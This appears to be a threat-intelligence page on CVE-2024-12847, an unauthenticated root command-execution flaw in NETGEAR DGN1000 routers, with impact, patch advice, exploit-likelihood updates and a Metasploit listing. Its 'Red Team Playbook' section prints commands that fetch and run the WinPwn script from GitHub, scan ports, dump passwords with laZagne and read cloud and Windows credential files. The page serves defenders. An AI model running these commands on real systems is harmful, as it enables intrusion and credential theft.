CVE-2024-12847
Overview
The vulnerability in NETGEAR DGN1000 firmware prior to version 1.1.00.48 is an authentication bypass that enables unauthorized remote command execution. The root cause lies in insufficient access control on the setup.cgi endpoint, which fails to validate user credentials before processing HTTP requests. This flaw affects the device's web-based configuration interface, allowing crafted requests to bypass authentication mechanisms.
Vulnerability Description
NETGEAR DGN1000 before 1.1.00.48 is vulnerable to an authentication bypass vulnerability. A remote and unauthenticated attacker can execute arbitrary operating system commands as root by sending crafted HTTP requests to the setup.cgi endpoint. This vulnerability has been observed to be exploited in the wild since at least 2017 and specifically by the Shadowserver Foundation on 2025-02-06 UTC.
Impact
An unauthenticated remote attacker can execute arbitrary commands as root on the affected device by sending crafted HTTP requests, enabling full control over the system. No authentication or user interaction is required, and the attack can be launched over the network (CVSS vector AV:N/AC:L/PR:N/UI:N). This can lead to complete device compromise, allowing attackers to disrupt services, exfiltrate data, or use the device as a foothold for further network intrusion.
Solution
Users should upgrade NETGEAR DGN1000 firmware to version 1.1.00.48 or later, which addresses the authentication bypass vulnerability. The fix is documented in the NETGEAR security advisory available through referenced exploit databases and security mailing lists. No official workaround is provided; therefore, timely firmware update is critical to mitigate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The authentication bypass vulnerability in the NETGEAR DGN1000 router firmware presents a significant security risk due to its ability to allow unauthorized remote access to the device. This flaw exists in the setup.cgi endpoint, which is responsible for handling configuration requests. By exploiting this vulnerability, an attacker can send specially crafted HTTP requests that bypass the authentication mechanism, enabling them to execute arbitrary operating system commands with root privileges. Such a breach can lead to complete control over the device, allowing for further exploitation of the network to which the router is connected.
Attack vectors for this vulnerability are primarily remote, meaning that an attacker does not need physical access to the device to exploit it. The exploitation can occur through various means, including scanning for vulnerable devices on the internet or targeting specific IP addresses known to host the affected firmware version. Once the attacker identifies a target, they can craft HTTP requests that manipulate the setup.cgi endpoint, leading to command execution. This type of attack can be particularly insidious, as it can be automated and executed at scale, impacting numerous devices simultaneously. Additionally, the potential for exploitation has been observed in the wild, indicating that threat actors are actively leveraging this vulnerability for malicious purposes.
The real-world impact of this vulnerability is profound, particularly for businesses that rely on the NETGEAR DGN1000 for their networking needs. Successful exploitation can lead to unauthorized access to sensitive data, compromise of internal networks, and the potential for lateral movement to other connected devices. The risk extends beyond immediate data breaches; it can also result in significant financial losses, reputational damage, and regulatory repercussions, especially if customer data is involved. Organizations may face increased scrutiny from regulatory bodies and a loss of customer trust, which can have long-term effects on their operations and market position.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating firmware to the latest versions is crucial, as manufacturers often release patches to address known vulnerabilities. Network monitoring tools can be employed to detect unusual traffic patterns or unauthorized access attempts to the setup.cgi endpoint. Additionally, implementing firewall rules to restrict access to the management interfaces of the router can significantly reduce the attack surface. Organizations should also conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the authentication bypass vulnerability in the NETGEAR DGN1000 poses a critical threat that can lead to severe consequences for affected organizations. Understanding the technical details, potential attack vectors, and real-world implications is essential for effective risk management. By adopting robust detection and mitigation strategies, organizations can safeguard their networks against exploitation and enhance their overall cybersecurity posture.
CSURFACE threat intelligence has identified a notable increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2024-12847, rising by over 10% to a current value near 0.79, placing it in the 99th percentile for exploit likelihood. This upward adjustment occurs despite a significant reduction in detection activity reported by our telemetry, suggesting that while active exploitation attempts may have temporarily declined, the overall risk of exploitation remains critically high. The divergence between lower detection rates and a rising EPSS score indicates potential shifts in attacker tactics, possibly involving more targeted or stealthy operations that evade conventional detection methods. This evolving landscape underscores the persistent threat posed by this authentication bypass vulnerability, particularly given its long history of exploitation and the availability of Metasploit modules facilitating unauthenticated root command execution. Consequently, defenders should recognize that the elevated EPSS score reflects an increased probability of exploitation attempts in the near term, warranting sustained vigilance despite the apparent dip in observed activity. The risk level remains critical, with the potential for severe operational impact if exploited, reinforcing the need for continuous monitoring and adaptive defensive postures.
Update 2 — June 22, 2026
CSURFACE threat intelligence has identified a modest increase in exploitation attempts targeting the NETGEAR DGN1000 authentication bypass vulnerability, as reflected by a slight rise in detection activity across our sensors. Despite this uptick, the EPSS score has declined significantly, indicating a reduced overall likelihood of widespread exploitation in the immediate term. This divergence suggests that while opportunistic or targeted attacks may be persisting or marginally increasing, the broader exploit momentum is waning. For defenders, this nuanced shift underscores the importance of maintaining vigilance without overestimating the immediacy of the threat. The availability of Metasploit modules continues to facilitate exploitation, but the decreasing EPSS trend may reflect improved patch adoption or shifting attacker focus. Consequently, the risk level remains critical due to the vulnerability’s inherent severity and potential impact, yet the current threat landscape signals a stabilization rather than escalation in active exploitation campaigns.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Netgear | Dgn1000 Firmware | All |
cpe:2.3:o:netgear:dgn1000_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Netgear DGN1000 Setup.cgi Unauthenticated RCE
exploits/linux/http/netgear_dgn1000_setup_unauth_exec
|
Mumbai, Robort Palerie <[email protected]> | Unknown | - | View |
Threat Feed
31 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
54%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
51%
|
Medium | High | |
| CAPEC-6 | Argument Injection |
48%
|
High | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-12847 |
| seclists.org |
GitHub CVE
third-party-advisory
technical-description
|
https://seclists.org/bugtraq/2013/Jun/8 |
| exploit-db.com |
GitHub CVE
exploit
|
https://www.exploit-db.com/exploits/25978 |
| exploit-db.com |
GitHub CVE
exploit
|
https://www.exploit-db.com/exploits/43055 |
| vulncheck.com |
GitHub CVE
third-party-advisory
|
https://vulncheck.com/advisories/netgear-dgn |